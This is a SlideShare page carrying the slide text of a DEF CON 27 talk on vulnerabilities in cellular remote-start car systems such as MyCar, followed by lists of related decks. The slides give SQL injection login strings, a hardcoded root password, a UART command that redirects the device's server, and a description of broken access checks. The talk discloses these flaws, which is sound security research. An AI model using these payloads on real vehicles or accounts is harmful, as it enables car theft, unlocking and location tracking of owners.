SlideShare a Scribd company logo

DEF CON 27 - JMAXXZ - your car is my car

Felipe Prado
Felipe Prado

DEF CON 27 - JMAXXZ - your car is my car

Technology
1 of 68
Download to read offline
Your Car Is My Car
About me ● Software Engineer by trade ● Hacker by passion ● Lock picker for fun ● The best puzzles are not meant to be solved ● All opinions are my own, and may not reflect those of my past, present, or future employers ● Twitter: @Jmaxxz
Backstory
Image Source:https://commons.wikimedia.org/wiki/File:Raynauld.jpg
Traditional car ignitions ● Lock + Switch Image source: https://www.autozone.com/batteries-starting-and-charging/ignition-switch/duralast-ignition-switch/342354_0
"Modern" Car Ignitions ● Lock + Electronic Lock + Switch
"Data-link" bus 5V UART 9600 BAUD
0C 0E 03 32 03 FF FF F1 35 0D Start Sentinel End Sentinel Direction (I.E. Garbage) Command Length Payload (Address) Checksum
Demos
Particle.io firmware can be found at: https://github.com/jmaxxz/OpenRemoteStart
MyCar (Cellular Remote)
MyCar AKA ● Linkr-LT1 ● MyCar Kia ● Visions MyCar ● Carlink (CL6)
How does this happen?
RX TX
Tips for using Uart ● 3.3v 115200 baud uart ● Change server AT+XIP="173.27.224.18",46033 ● root password is oelinux123 ● https://fccid.io/2AEB4AG21/User-Manual/User-manual-3104674 RX TX
Demo Example Vectors Untargeted (admin) UserName: API Password: f") OR "1"<>"1 Targeted UserName: example@example.com" OR ("1"<>"1 Password: a") OR "1"<>"1
Remote Starting a Car
Demo
Getting Command Status
No Direct Object Reference?
Duplicate Information ● USER_EMAIL ≈ ACCOUNT_ID
Duplicate Info Can Lead to Bugs // Case 3 if(USER_EMAIL owns ACCOUNT_ID) { DoCommand(); } // Case 4 if(USER_EMAIL owns ACCOUNT_ID AND ACCOUNT_ID owns DEVICE_ID){ DoCommand(); } // Case 1 if(USER_EMAIL owns DEVICE_ID){ DoCommand(); } // Case 2 if(ACCOUNT_ID owns DEVICE_ID){ DoCommand(); }
Direct Object Reference
An attacker could Remotely ● Locate car ● Unlock car ● Start car ● Lock car ● Trigger alarm ● Edit car ● Check the status of any command
MyCar's Fix For Hardcoded Password Old: New:
Reverse Proxies Don't Fix Everything
MyCar shows your car's current location
But…
And track the most common places you visit
Unlike public cloud environments that battle for priority, Procon Analytics use virtual private cloud that supports only our customers and applications with no interference from other users. This dedicated, highly secure environment ensures higher availability and faster delivery of service. ... When you partner with Procon Analytics, you can be assured that your data is secure and protected.
How does this happen? How do we stop it?
● https://fortin.ca/en/evo-one.html [Evo One page on Fortin website] ● https://commons.wikimedia.org/wiki/File:Raynauld.jpg [image of hand with Raynaulds] ● http://www.lescodistributing.com/1117_Omega.pdf [Image of LINKR-LT1 ad] ● https://www.autozone.com/batteries-starting-and-charging/ignition-switch/duralast-ignition-switch/342354_0 [Ignition switch] ● https://cdn02.fortin.ca/download/57211/evo-one_ig_tha_bi_sub1-forester-wrx-sti-2015_key_b_57211.pdf [Fortin One install manual Subaru Impreza 2012] ● https://fortin.ca/download/64631/omega-linkr-lt1-install-guide-64631.pdf [omega linkr-lt1 install guide] ● https://www.chicagotribune.com/suburbs/lake-county-news-sun/ct-keyless-ignition-risk-met-20150618-story.html [Remote Started car almost kills couple, CO poisoning] ● https://www.youtube.com/watch?v=6kwQtugSZ9g [Mustang Accident, Remote Starter] ● https://www.youtube.com/watch?v=j6Wntha7ft8 [Top 3 Ways Thieves Steal Cars] ● https://www.youtube.com/watch?v=2v5dNCR7NJ4 [Gone in Under 60 seconds...Auto/Truck Theft] ● https://fortin.ca/en/qa/87632/can-get-datalink-protocol-and-technical-specs-if-looking-develop-remote-start-interface-device ● http://phillipsind.com/media_relations/press_releases/1273 ● http://connected-holdings.com/portfolio_page ● https://proconanalytics.com/ ● https://en.wikipedia.org/wiki/The_Market_for_Lemons ● https://www.iii.org/fact-statistic/facts-statistics-auto-theft [Car theft data for USA] ● Thanks to Twitter: @lizzymcfarland [For proofreading my bio and abstract] Sources + Misc links

Recommended

Building Beautiful High Performance Connected Car Applications
Building Beautiful High Performance Connected Car ApplicationsBuilding Beautiful High Performance Connected Car Applications
Building Beautiful High Performance Connected Car ApplicationsJason Wiener
 
Da dongle
Da dongleDa dongle
Da dongleEchoCullen
 
Autoboss v30 user-manual_v1.65
Autoboss v30 user-manual_v1.65Autoboss v30 user-manual_v1.65
Autoboss v30 user-manual_v1.65Bill Zhao
 
JDiag Elite J2534 Software Quick Start Guide-obd365
JDiag Elite J2534 Software Quick Start Guide-obd365JDiag Elite J2534 Software Quick Start Guide-obd365
JDiag Elite J2534 Software Quick Start Guide-obd365OBD365
 
Cloud Conf Varna: Vagrant and Amazon
Cloud Conf Varna: Vagrant and AmazonCloud Conf Varna: Vagrant and Amazon
Cloud Conf Varna: Vagrant and AmazonDimitar Danailov
 
eagleeye-151129054531-lva1-app6892.pptx
eagleeye-151129054531-lva1-app6892.pptxeagleeye-151129054531-lva1-app6892.pptx
eagleeye-151129054531-lva1-app6892.pptxKGANESH34
 
Techprom presentation 1 6-18-10
Techprom presentation 1 6-18-10Techprom presentation 1 6-18-10
Techprom presentation 1 6-18-10Videotomsk
 
MongoDB .local London 2019: The Tech Behind Connected Car
MongoDB .local London 2019: The Tech Behind Connected CarMongoDB .local London 2019: The Tech Behind Connected Car
MongoDB .local London 2019: The Tech Behind Connected CarMongoDB
 

Recommended

Building Beautiful High Performance Connected Car Applications
Building Beautiful High Performance Connected Car ApplicationsBuilding Beautiful High Performance Connected Car Applications
Building Beautiful High Performance Connected Car ApplicationsJason Wiener
 
Da dongle
Da dongleDa dongle
Da dongleEchoCullen
 
Autoboss v30 user-manual_v1.65
Autoboss v30 user-manual_v1.65Autoboss v30 user-manual_v1.65
Autoboss v30 user-manual_v1.65Bill Zhao
 
JDiag Elite J2534 Software Quick Start Guide-obd365
JDiag Elite J2534 Software Quick Start Guide-obd365JDiag Elite J2534 Software Quick Start Guide-obd365
JDiag Elite J2534 Software Quick Start Guide-obd365OBD365
 
Cloud Conf Varna: Vagrant and Amazon
Cloud Conf Varna: Vagrant and AmazonCloud Conf Varna: Vagrant and Amazon
Cloud Conf Varna: Vagrant and AmazonDimitar Danailov
 
eagleeye-151129054531-lva1-app6892.pptx
eagleeye-151129054531-lva1-app6892.pptxeagleeye-151129054531-lva1-app6892.pptx
eagleeye-151129054531-lva1-app6892.pptxKGANESH34
 
Techprom presentation 1 6-18-10
Techprom presentation 1 6-18-10Techprom presentation 1 6-18-10
Techprom presentation 1 6-18-10Videotomsk
 
MongoDB .local London 2019: The Tech Behind Connected Car
MongoDB .local London 2019: The Tech Behind Connected CarMongoDB .local London 2019: The Tech Behind Connected Car
MongoDB .local London 2019: The Tech Behind Connected CarMongoDB
 
Why go into Android Apps Development
Why go into Android Apps Development Why go into Android Apps Development
Why go into Android Apps Development Jomar Tigcal
 
Techprom presentation 1 6-18-9
Techprom presentation 1 6-18-9Techprom presentation 1 6-18-9
Techprom presentation 1 6-18-9Videotomsk
 
From Driver Distraction to Driver Augmentation: Open Source in Cars
From Driver Distraction to Driver Augmentation: Open Source in CarsFrom Driver Distraction to Driver Augmentation: Open Source in Cars
From Driver Distraction to Driver Augmentation: Open Source in CarsAlison Chaiken
 
Driver drowsiness detection
Driver drowsiness detectionDriver drowsiness detection
Driver drowsiness detectionConnecting Point
 
DA-Dongle J2534
DA-Dongle J2534DA-Dongle J2534
DA-Dongle J2534obdvip.com
 
SW3 Presentation 14
SW3 Presentation 14SW3 Presentation 14
SW3 Presentation 14guestd0ad3d
 
Car Care.pptx
Car Care.pptxCar Care.pptx
Car Care.pptxOmarIsmail94
 
Fitur Terbaru Flutter di Tahun 2021 - Widyarso Joko Purnomo
Fitur Terbaru Flutter di Tahun 2021 - Widyarso Joko PurnomoFitur Terbaru Flutter di Tahun 2021 - Widyarso Joko Purnomo
Fitur Terbaru Flutter di Tahun 2021 - Widyarso Joko PurnomoDicodingEvent
 
Marek Jersak. Autonomous Drive – From Sensors to Motion
Marek Jersak. Autonomous Drive – From Sensors to MotionMarek Jersak. Autonomous Drive – From Sensors to Motion
Marek Jersak. Autonomous Drive – From Sensors to MotionIT Arena
 
Marek Jersak «Autonomous Drive – From Sensors to Motion».
Marek Jersak «Autonomous Drive – From Sensors to Motion».Marek Jersak «Autonomous Drive – From Sensors to Motion».
Marek Jersak «Autonomous Drive – From Sensors to Motion».LogeekNightUkraine
 
Shaping the Future of Automatic Programming
Shaping the Future of Automatic ProgrammingShaping the Future of Automatic Programming
Shaping the Future of Automatic ProgrammingChristos Tsakostas
 
Cloud-Connected Cars - Your Smartphone on Wheels
Cloud-Connected Cars - Your Smartphone on WheelsCloud-Connected Cars - Your Smartphone on Wheels
Cloud-Connected Cars - Your Smartphone on WheelsChristopher Mohritz
 
Challenges of building a search engine like web rendering service
Challenges of building a search engine like web rendering serviceChallenges of building a search engine like web rendering service
Challenges of building a search engine like web rendering serviceGiacomo Zecchini
 
Automatic gate control
Automatic gate controlAutomatic gate control
Automatic gate controlDipankar Haloi
 
Techprom presentation 1 6-18-8
Techprom presentation 1 6-18-8Techprom presentation 1 6-18-8
Techprom presentation 1 6-18-8Videotomsk
 
Truck Diagnostic Software Download - The-best-manuals-online.com
Truck Diagnostic Software Download - The-best-manuals-online.com Truck Diagnostic Software Download - The-best-manuals-online.com
Truck Diagnostic Software Download - The-best-manuals-online.comThe Best Manuals Online
 
Connected car
Connected carConnected car
Connected carLemberg Solutions
 
Open APIs - concepts. applications. visualizations.
Open APIs - concepts. applications. visualizations.Open APIs - concepts. applications. visualizations.
Open APIs - concepts. applications. visualizations.Christian Dalager
 
Autonomus_CarsFinal ok.pptx
Autonomus_CarsFinal ok.pptxAutonomus_CarsFinal ok.pptx
Autonomus_CarsFinal ok.pptxalphaalpha17
 
ODROID Magazine August 2014
ODROID Magazine August 2014ODROID Magazine August 2014
ODROID Magazine August 2014Nanik Tolaram
 
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryDEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryFelipe Prado
 
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...Felipe Prado
 

More Related Content

Similar to DEF CON 27 - JMAXXZ - your car is my car

Why go into Android Apps Development
Why go into Android Apps Development Why go into Android Apps Development
Why go into Android Apps Development Jomar Tigcal
 
Techprom presentation 1 6-18-9
Techprom presentation 1 6-18-9Techprom presentation 1 6-18-9
Techprom presentation 1 6-18-9Videotomsk
 
From Driver Distraction to Driver Augmentation: Open Source in Cars
From Driver Distraction to Driver Augmentation: Open Source in CarsFrom Driver Distraction to Driver Augmentation: Open Source in Cars
From Driver Distraction to Driver Augmentation: Open Source in CarsAlison Chaiken
 
Driver drowsiness detection
Driver drowsiness detectionDriver drowsiness detection
Driver drowsiness detectionConnecting Point
 
DA-Dongle J2534
DA-Dongle J2534DA-Dongle J2534
DA-Dongle J2534obdvip.com
 
SW3 Presentation 14
SW3 Presentation 14SW3 Presentation 14
SW3 Presentation 14guestd0ad3d
 
Fitur Terbaru Flutter di Tahun 2021 - Widyarso Joko Purnomo
Fitur Terbaru Flutter di Tahun 2021 - Widyarso Joko PurnomoFitur Terbaru Flutter di Tahun 2021 - Widyarso Joko Purnomo
Fitur Terbaru Flutter di Tahun 2021 - Widyarso Joko PurnomoDicodingEvent
 
Marek Jersak. Autonomous Drive – From Sensors to Motion
Marek Jersak. Autonomous Drive – From Sensors to MotionMarek Jersak. Autonomous Drive – From Sensors to Motion
Marek Jersak. Autonomous Drive – From Sensors to MotionIT Arena
 
Marek Jersak «Autonomous Drive – From Sensors to Motion».
Marek Jersak «Autonomous Drive – From Sensors to Motion».Marek Jersak «Autonomous Drive – From Sensors to Motion».
Marek Jersak «Autonomous Drive – From Sensors to Motion».LogeekNightUkraine
 
Shaping the Future of Automatic Programming
Shaping the Future of Automatic ProgrammingShaping the Future of Automatic Programming
Shaping the Future of Automatic ProgrammingChristos Tsakostas
 
Cloud-Connected Cars - Your Smartphone on Wheels
Cloud-Connected Cars - Your Smartphone on WheelsCloud-Connected Cars - Your Smartphone on Wheels
Cloud-Connected Cars - Your Smartphone on WheelsChristopher Mohritz
 
Challenges of building a search engine like web rendering service
Challenges of building a search engine like web rendering serviceChallenges of building a search engine like web rendering service
Challenges of building a search engine like web rendering serviceGiacomo Zecchini
 
Automatic gate control
Automatic gate controlAutomatic gate control
Automatic gate controlDipankar Haloi
 
Techprom presentation 1 6-18-8
Techprom presentation 1 6-18-8Techprom presentation 1 6-18-8
Techprom presentation 1 6-18-8Videotomsk
 
Truck Diagnostic Software Download - The-best-manuals-online.com
Truck Diagnostic Software Download - The-best-manuals-online.com Truck Diagnostic Software Download - The-best-manuals-online.com
Truck Diagnostic Software Download - The-best-manuals-online.comThe Best Manuals Online
 
Open APIs - concepts. applications. visualizations.
Open APIs - concepts. applications. visualizations.Open APIs - concepts. applications. visualizations.
Open APIs - concepts. applications. visualizations.Christian Dalager
 
Autonomus_CarsFinal ok.pptx
Autonomus_CarsFinal ok.pptxAutonomus_CarsFinal ok.pptx
Autonomus_CarsFinal ok.pptxalphaalpha17
 
ODROID Magazine August 2014
ODROID Magazine August 2014ODROID Magazine August 2014
ODROID Magazine August 2014Nanik Tolaram
 

Similar to DEF CON 27 - JMAXXZ - your car is my car (20)

Why go into Android Apps Development
Why go into Android Apps Development Why go into Android Apps Development
Why go into Android Apps Development
 
Techprom presentation 1 6-18-9
Techprom presentation 1 6-18-9Techprom presentation 1 6-18-9
Techprom presentation 1 6-18-9
 
From Driver Distraction to Driver Augmentation: Open Source in Cars
From Driver Distraction to Driver Augmentation: Open Source in CarsFrom Driver Distraction to Driver Augmentation: Open Source in Cars
From Driver Distraction to Driver Augmentation: Open Source in Cars
 
Driver drowsiness detection
Driver drowsiness detectionDriver drowsiness detection
Driver drowsiness detection
 
DA-Dongle J2534
DA-Dongle J2534DA-Dongle J2534
DA-Dongle J2534
 
SW3 Presentation 14
SW3 Presentation 14SW3 Presentation 14
SW3 Presentation 14
 
Car Care.pptx
Car Care.pptxCar Care.pptx
Car Care.pptx
 
Fitur Terbaru Flutter di Tahun 2021 - Widyarso Joko Purnomo
Fitur Terbaru Flutter di Tahun 2021 - Widyarso Joko PurnomoFitur Terbaru Flutter di Tahun 2021 - Widyarso Joko Purnomo
Fitur Terbaru Flutter di Tahun 2021 - Widyarso Joko Purnomo
 
Marek Jersak. Autonomous Drive – From Sensors to Motion
Marek Jersak. Autonomous Drive – From Sensors to MotionMarek Jersak. Autonomous Drive – From Sensors to Motion
Marek Jersak. Autonomous Drive – From Sensors to Motion
 
Marek Jersak «Autonomous Drive – From Sensors to Motion».
Marek Jersak «Autonomous Drive – From Sensors to Motion».Marek Jersak «Autonomous Drive – From Sensors to Motion».
Marek Jersak «Autonomous Drive – From Sensors to Motion».
 
Shaping the Future of Automatic Programming
Shaping the Future of Automatic ProgrammingShaping the Future of Automatic Programming
Shaping the Future of Automatic Programming
 
Cloud-Connected Cars - Your Smartphone on Wheels
Cloud-Connected Cars - Your Smartphone on WheelsCloud-Connected Cars - Your Smartphone on Wheels
Cloud-Connected Cars - Your Smartphone on Wheels
 
Challenges of building a search engine like web rendering service
Challenges of building a search engine like web rendering serviceChallenges of building a search engine like web rendering service
Challenges of building a search engine like web rendering service
 
Automatic gate control
Automatic gate controlAutomatic gate control
Automatic gate control
 
Techprom presentation 1 6-18-8
Techprom presentation 1 6-18-8Techprom presentation 1 6-18-8
Techprom presentation 1 6-18-8
 
Truck Diagnostic Software Download - The-best-manuals-online.com
Truck Diagnostic Software Download - The-best-manuals-online.com Truck Diagnostic Software Download - The-best-manuals-online.com
Truck Diagnostic Software Download - The-best-manuals-online.com
 
Connected car
Connected carConnected car
Connected car
 
Open APIs - concepts. applications. visualizations.
Open APIs - concepts. applications. visualizations.Open APIs - concepts. applications. visualizations.
Open APIs - concepts. applications. visualizations.
 
Autonomus_CarsFinal ok.pptx
Autonomus_CarsFinal ok.pptxAutonomus_CarsFinal ok.pptx
Autonomus_CarsFinal ok.pptx
 
ODROID Magazine August 2014
ODROID Magazine August 2014ODROID Magazine August 2014
ODROID Magazine August 2014
 

More from Felipe Prado

DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryDEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryFelipe Prado
 
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...Felipe Prado
 
DEF CON 24 - Tamas Szakaly - help i got ants
DEF CON 24 - Tamas Szakaly - help i got antsDEF CON 24 - Tamas Szakaly - help i got ants
DEF CON 24 - Tamas Szakaly - help i got antsFelipe Prado
 
DEF CON 24 - Ladar Levison - compelled decryption
DEF CON 24 - Ladar Levison - compelled decryptionDEF CON 24 - Ladar Levison - compelled decryption
DEF CON 24 - Ladar Levison - compelled decryptionFelipe Prado
 
DEF CON 24 - Clarence Chio - machine duping 101
DEF CON 24 - Clarence Chio - machine duping 101DEF CON 24 - Clarence Chio - machine duping 101
DEF CON 24 - Clarence Chio - machine duping 101Felipe Prado
 
DEF CON 24 - Chris Rock - how to overthrow a government
DEF CON 24 - Chris Rock - how to overthrow a governmentDEF CON 24 - Chris Rock - how to overthrow a government
DEF CON 24 - Chris Rock - how to overthrow a governmentFelipe Prado
 
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardwareDEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardwareFelipe Prado
 
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...Felipe Prado
 
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustrationDEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustrationFelipe Prado
 
DEF CON 24 - Gorenc Sands - hacker machine interface
DEF CON 24 - Gorenc Sands - hacker machine interfaceDEF CON 24 - Gorenc Sands - hacker machine interface
DEF CON 24 - Gorenc Sands - hacker machine interfaceFelipe Prado
 
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionistDEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionistFelipe Prado
 
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locksDEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locksFelipe Prado
 
DEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud securityDEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud securityFelipe Prado
 
DEF CON 24 - Grant Bugher - Bypassing captive portals
DEF CON 24 - Grant Bugher - Bypassing captive portalsDEF CON 24 - Grant Bugher - Bypassing captive portals
DEF CON 24 - Grant Bugher - Bypassing captive portalsFelipe Prado
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchDEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchFelipe Prado
 
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...Felipe Prado
 
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucksDEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucksFelipe Prado
 
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
DEF CON 24 - Dinesh and Shetty - practical android application exploitationDEF CON 24 - Dinesh and Shetty - practical android application exploitation
DEF CON 24 - Dinesh and Shetty - practical android application exploitationFelipe Prado
 
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vncDEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vncFelipe Prado
 
DEF CON 24 - Antonio Joseph - fuzzing android devices
DEF CON 24 - Antonio Joseph - fuzzing android devicesDEF CON 24 - Antonio Joseph - fuzzing android devices
DEF CON 24 - Antonio Joseph - fuzzing android devicesFelipe Prado
 

More from Felipe Prado (20)

DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directoryDEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
DEF CON 24 - Sean Metcalf - beyond the mcse red teaming active directory
 
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
DEF CON 24 - Bertin Bervis and James Jara - exploiting and attacking seismolo...
 
DEF CON 24 - Tamas Szakaly - help i got ants
DEF CON 24 - Tamas Szakaly - help i got antsDEF CON 24 - Tamas Szakaly - help i got ants
DEF CON 24 - Tamas Szakaly - help i got ants
 
DEF CON 24 - Ladar Levison - compelled decryption
DEF CON 24 - Ladar Levison - compelled decryptionDEF CON 24 - Ladar Levison - compelled decryption
DEF CON 24 - Ladar Levison - compelled decryption
 
DEF CON 24 - Clarence Chio - machine duping 101
DEF CON 24 - Clarence Chio - machine duping 101DEF CON 24 - Clarence Chio - machine duping 101
DEF CON 24 - Clarence Chio - machine duping 101
 
DEF CON 24 - Chris Rock - how to overthrow a government
DEF CON 24 - Chris Rock - how to overthrow a governmentDEF CON 24 - Chris Rock - how to overthrow a government
DEF CON 24 - Chris Rock - how to overthrow a government
 
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardwareDEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
DEF CON 24 - Fitzpatrick and Grand - 101 ways to brick your hardware
 
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
DEF CON 24 - Rogan Dawes and Dominic White - universal serial aBUSe remote at...
 
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustrationDEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
DEF CON 24 - Jay Beale and Larry Pesce - phishing without frustration
 
DEF CON 24 - Gorenc Sands - hacker machine interface
DEF CON 24 - Gorenc Sands - hacker machine interfaceDEF CON 24 - Gorenc Sands - hacker machine interface
DEF CON 24 - Gorenc Sands - hacker machine interface
 
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionistDEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
DEF CON 24 - Allan Cecil and DwangoAC - tasbot the perfectionist
 
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locksDEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
DEF CON 24 - Rose and Ramsey - picking bluetooth low energy locks
 
DEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud securityDEF CON 24 - Rich Mogull - pragmatic cloud security
DEF CON 24 - Rich Mogull - pragmatic cloud security
 
DEF CON 24 - Grant Bugher - Bypassing captive portals
DEF CON 24 - Grant Bugher - Bypassing captive portalsDEF CON 24 - Grant Bugher - Bypassing captive portals
DEF CON 24 - Grant Bugher - Bypassing captive portals
 
DEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitchDEF CON 24 - Patrick Wardle - 99 problems little snitch
DEF CON 24 - Patrick Wardle - 99 problems little snitch
 
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
DEF CON 24 - Plore - side -channel attacks on high security electronic safe l...
 
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucksDEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
DEF CON 24 - Six Volts and Haystack - cheap tools for hacking heavy trucks
 
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
DEF CON 24 - Dinesh and Shetty - practical android application exploitationDEF CON 24 - Dinesh and Shetty - practical android application exploitation
DEF CON 24 - Dinesh and Shetty - practical android application exploitation
 
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vncDEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
DEF CON 24 - Klijnsma and Tentler - stargate pivoting through vnc
 
DEF CON 24 - Antonio Joseph - fuzzing android devices
DEF CON 24 - Antonio Joseph - fuzzing android devicesDEF CON 24 - Antonio Joseph - fuzzing android devices
DEF CON 24 - Antonio Joseph - fuzzing android devices
 

Recently uploaded

AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
 
Next-generation AAM aircraft unveiled by Supernal, S-A2
Next-generation AAM aircraft unveiled by Supernal, S-A2Next-generation AAM aircraft unveiled by Supernal, S-A2
Next-generation AAM aircraft unveiled by Supernal, S-A2Hyundai Motor Group
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Pigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions Piggable Sweeping Elbows
Pigging Solutions Piggable Sweeping ElbowsPigging Solutions
 
Enhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersEnhancing Worker Digital Experience: A Hands-on Workshop for Partners
Enhancing Worker Digital Experience: A Hands-on Workshop for PartnersThousandEyes
 
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking Men08448380779 Call Girls In Diplomatic Enclave Women Seeking Men
08448380779 Call Girls In Diplomatic Enclave Women Seeking MenDelhi Call girls
 
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your BudgetHyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your Budget
Hyderabad Call Girls Khairatabad ✨ 7001305949 ✨ Cheap Price Your BudgetEnjoy Anytime
 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...Transforming Data Streams with Kafka Connect: An Introduction to Single Messa...
